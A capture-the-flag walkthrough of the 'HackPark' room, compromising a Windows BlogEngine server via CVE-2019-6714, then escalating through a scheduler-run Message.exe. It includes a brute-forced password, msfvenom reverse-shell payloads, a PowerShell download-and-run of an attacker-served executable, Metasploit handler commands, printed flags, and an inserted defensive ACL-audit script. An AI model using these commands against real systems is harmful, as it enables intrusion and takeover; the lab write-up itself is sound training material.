
HackPark

Click here if you’re interested in the room!

This guide is meant to be used as a supplement for learning, please tackle this on your own before reading this!

  1. What’s the name of the clown displayed on the homepage?
  2. What request type is the Windows website login form using?
  3. Guess a username, choose a password wordlist and gain credentials to a user account!
  4. Now you have logged into the website, are you able to identify the version of the BlogEngine?
  5. What is the CVE?
  6. Using the public exploit, gain initial access to the server. Who is the webserver running as?
  7. Generating a reverse-shell payload using msfvenom (naming mine hello.exe)
  8. What is the OS version of this windows machine?
  9. What is the name of the abnormal service running?
  10. What is the name of the binary you’re supposed to exploit?
  11. What was the Original Install time? (This is date and time)

1) What’s the name of the clown displayed on the homepage?

pennywise

2) What request type is the Windows website login form using?

POST

3) Guess a username, choose a password wordlist and gain credentials to a user account!

From the hints we can see that the username is admin, and we will be using the infamous rockyou.txt as the password list.

Using Burp Suite to intercept the login request, we can see the POST form and the body it submits.

login: admin
password: 1qaz2wsx

4) Now you have logged into the website, are you able to identify the version of the BlogEngine?

Scrolling down to the About tab on the left we can identify the version.

3.3.6.0

5) What is the CVE?

Now we need to gain access to the machine through a reverse shell. Searching www.exploit-db.com for “BlogEngine” turns up a suitable vulnerability.

We found what we’re looking for.

CVE-2019-6714

6) Using the public exploit, gain initial access to the server. Who is the webserver running as?

Go to Content -> Posts -> Welcome to HackPark

Upload PostView.ascx

Set up a netcat listener on your chosen port.

nc -lvnp 4444

Then browse to

http://{target_ip}/?theme=../../App_Data/files

iis apppool\blog

Time to pivot from netcat to meterpreter for a more fully featured shell.

7) Generating a reverse-shell payload using msfvenom (naming mine hello.exe)

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST={your_ip} LPORT={your port} -f exe -o hello.exe

Set up an HTTP server on the attacking machine to serve the payload.

python3 -m http.server

First, navigate to C:\Windows\Temp

Download the payload.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/hello.exe','hello.exe')"

Set up the Metasploit handler

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT {your port}
set LHOST {your ip}
run

Start the process

powershell "Start-Process 'hello.exe'"

We now have a meterpreter session!

8) What is the OS version of this windows machine?

Windows 2012 R2 (6.3 Build 9600)

I’m going to enumerate the machine further using winPEAS.

upload winPEAS.bat
shell
winPEAS.bat

9) What is the name of the abnormal service running?

I see something interesting

WindowsScheduler

10) What is the name of the binary you’re supposed to exploit?

Navigating to “C:\Program Files (x86)\SystemScheduler\events”

Taking a glance at all the .txt files, I see something that sticks out:

Message.exe seems to be running approximately every 30 seconds as admin.

Message.exe
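As an added defender-side check that is not part of the original writeup, the following PowerShell audits the vendor services on a host for exactly this weakness: an executable that a privileged scheduler launches but that low-privileged accounts are allowed to overwrite. It assumes an elevated prompt on the host being checked; the principal list and the function names are my own.

```powershell
# Added example (not from the original writeup): find executables beside a
# vendor service binary that low-privileged users can overwrite.
# Assumption: run from an elevated PowerShell prompt on the host being checked.

# Principals whose write access to an admin/SYSTEM-executed binary is a finding.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Named rights that allow replacing file contents; Modify and FullControl include Write.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
$GenericWriteOrAll = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

function Get-ExecutablePath {
    # Pull the .exe out of a Win32_Service PathName, which may be quoted and
    # carry arguments, e.g. "C:\Program Files (x86)\Vendor\svc.exe" -run
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Test-WritableByLowPriv {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Generic rights show up as raw bits, so compare as integers.
        $rights = [int]$ace.FileSystemRights
        if (($rights -band [int]$WriteMask) -ne 0) { return $true }
        if (($rights -band $GenericWriteOrAll) -ne 0) { return $true }
    }
    return $false
}

# Skip services under \Windows\; for each vendor service check the service binary
# and every .exe beside it, since a scheduler runs those with its own privileges.
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -and $_.PathName -notmatch '\\Windows\\' } |
    ForEach-Object {
        $svc = $_
        $exe = Get-ExecutablePath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        Get-ChildItem -LiteralPath (Split-Path -Parent $exe) -Filter *.exe -File |
            ForEach-Object {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                    File = $_.FullName; Writable = Test-WritableByLowPriv $_.FullName }
            }
    } | Where-Object Writable | Format-Table -AutoSize
```

Any row this prints is a file that should either be made writable only by administrators or moved out of the scheduler's reach, and the scheduled task itself should run as a least-privileged account rather than an administrator.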

Let’s run our own payload abusing this fact.

Generate a msfvenom payload called Message.exe

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST={your_ip} LPORT={your_port} -f exe -o Message.exe

Set up another meterpreter session or a netcat session.

Go to “C:\Program Files (x86)\SystemScheduler” and overwrite Message.exe

After a few seconds we should be connected:


I’m in the meterpreter session, so to search for text files:

search -f *.txt

cat "c:\Users\jeff\Desktop\user.txt"
cat "c:\Users\Administrator\Desktop\root.txt"

FLAG for Jeff 759bd8af507517bcfaede78a21a73e39

FLAG for Root 7e13d97f05f7ceb9881a3eb3d78d3e72

11) What was the Original Install Time?

Spawn a regular shell from meterpreter session then use the command systeminfo to find the time.

shell
systeminfo

8/3/2019 10:43:23
This post is licensed under CC BY 4.0 by the author.